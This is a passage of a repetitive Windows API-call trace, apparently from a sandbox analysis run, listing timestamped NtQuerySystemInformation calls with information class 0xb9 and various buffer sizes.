NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd410, Length=0x28, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0211.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd330, Length=0x20, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3f0, Length=0x20, ResultLength=0x0) [0211.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd410, Length=0x28, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0211.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd330, Length=0x20, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3f0, Length=0x20, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x28, ResultLength=0x0) [0211.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0211.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb30, Length=0x20, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb30, Length=0x20, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb30, Length=0x20, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb60, Length=0x20, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x20, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x20, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, 